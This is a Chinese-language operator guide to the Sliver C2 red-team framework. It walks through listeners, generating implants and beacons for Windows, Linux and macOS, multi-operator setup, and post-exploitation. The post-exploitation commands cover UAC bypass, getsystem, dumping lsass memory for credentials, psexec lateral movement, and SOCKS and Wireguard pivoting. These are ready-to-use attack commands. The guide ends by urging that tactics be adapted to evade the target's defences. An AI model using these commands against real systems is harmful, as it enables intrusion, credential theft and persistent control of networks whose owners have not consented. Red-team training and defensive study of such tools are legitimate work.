Sliver C2 红队框架全面指南

一、Sliver C2 概述

1.1 基本概念

C2 (Command and Control)：命令与控制框架，允许攻击者在获取初始权限后进行后渗透操作。

Sliver C2：一个开源的跨平台红队框架，具有以下特点：

• 免杀能力极强
• 模块化设计，支持多种扩展
• 支持多操作员协作
• 开源且跨平台(Linux, Windows, MacOS)

1.2 关键术语

• Implant：用于保持访问权限的恶意软件
• Beacon：定期连接C2服务器的通信模式
• Stage：载入方法(阶段式或非阶段式)

1.3 操作模式

1. Beacon模式：异步通信，默认每分钟检查一次
2. Session模式：实时会话方式

1.4 系统架构

1. 服务器控制台：主界面，通过sliver-server启动
2. Sliver C2服务器：管理数据库和网络监听器
3. 客户端控制台：与服务器交互的用户界面
4. 植入物(Implant)：目标系统上运行的恶意代码

二、部署指南

2.1 系统要求

• 推荐在Linux上部署服务器
• 可选依赖：
  • MinGW(用于DLL有效载荷)
  • Metasploit(用于MSF集成功能)

2.2 安装步骤

1. 从GitHub仓库下载对应版本：
   • BishopFox/sliver
2. 下载Server和Client版本
3. 启动服务器：./sliver-server_linux

三、核心功能详解

3.1 监听器(Listener)

支持协议：

• mTLS(相互传输层安全)
• HTTP/HTTPS
• DNS
• Wireguard

常用命令：

# 创建mTLS监听器
mtls -l 443

# 创建HTTP监听器
http -l 9001

3.2 植入物(Implant)生成

# 生成Windows植入物
generate --http http://[IP]:9001 --os windows

# 生成Linux植入物
generate --mtls [IP]:443 --os linux --arch amd64

# 生成MacOS植入物
generate --mtls [IP]:443 --os mac --arch arm64

# 查看所有植入物
implants

# 重新生成指定植入物
regenerate --save . [Implant Name]

3.3 会话管理

# 查看活动会话
sessions

# 进入会话交互
use [session ID]

# 基本命令
shell          # 开启命令行窗口
execute -o ipconfig  # 执行命令

3.4 信标(Beacon)

# 生成Beacon载荷
generate beacon --http http://[IP]:9002

# 创建对应监听器
http -l 9002

# 实时监控Beacon通信
beacons watch

3.5 扩展管理器(Armory)

# 安装第三方工具(如Rubeus)
armory install rubeus

3.6 多操作员模式

# 添加新操作员
new-operator --name [name] --lhost [IP]

# 启动多操作员模式
multiplayer
multiplayer -l 8848  # 指定端口

# 客户端连接
./sliver-client import [config].cfg

四、后渗透利用技术

4.1 Windows环境利用

执行命令

shell          # 开启命令行
execute -o ipconfig  # 直接执行命令
runas -p "ipconfig.exe" -u "user" -P "password"  # 以其他用户身份运行

权限提升

# 绕过UAC(需上传脚本)
upload /path/to/uac.ps1 "C:\path\uac.ps1"
execute -o powershell -ExecutionPolicy Bypass -File "C:\path\uac.ps1"

# 获取SYSTEM权限
getsystem

持久化

# 查看进程
ps

# 进程迁移
migrate [PID]

# 切换会话
use [session ID]

凭据访问

# 导出lsass.dump(需SYSTEM权限)
procdump --pid [PID] --save lsass.dump

# 离线解析(在Kali上)
pypykatz lsa minidump lsass.dump

网络发现

# 获取网络邻居
execute -o powershell "Get-NetNeighbor | Where-Object -Property State -NE 'Unreachable' | Select-Object -Property IPAddress"

# Ping扫描
execute -o powershell "99..102 | foreach { '10.10.1.${_}: $(Test-Connection -TimeToLive 64 -Count 1 -ComputerName 10.10.1.${_} -Quiet)' }"

横向移动

# 创建psexec配置文件
profiles new --format service --skip-symbols --mtls [IP] psexec_test

# 执行psexec攻击
psexec -profile pentest --service-name pentest -service-description pentest [target]

4.2 内网穿透

Socks代理

# 启动Socks5代理
socks5 start -P 9001

Wireguard端口转发

# 创建Wireguard监听器
wg --lport 9100

# 生成Wireguard植入物
generate --wg [IP]:9100 --os windows --arch amd64 --format exe

# 添加端口转发
wg-portfwd add -r [target IP]:3389

# 导出Wireguard配置
wg-config -s /path/to/wireguard.conf

五、安全配置建议

1. 修改默认端口：

   • 编辑服务器配置：~/.sliver/configs/server.json
   • 修改操作员配置文件中的端口设置

2. 使用非常见端口：避免使用常见C2端口(如443, 8080等)

六、后续研究方向

1. BOFs和COFFs的使用
2. 各协议通信数据包分析
3. 植入物免杀技术深入研究
4. 实战中的高级利用技巧

七、与Cobalt Strike对比

Sliver C2作为Cobalt Strike的开源替代品，具有以下优势：

• 完全开源
• 跨平台支持
• 内置Wireguard支持
• 模块化设计
• 免杀能力突出

建议参考在线C2工具对比表格了解详细功能差异。

本指南涵盖了Sliver C2的核心功能和基本使用方法，实际使用中应根据目标环境和防御措施灵活调整战术。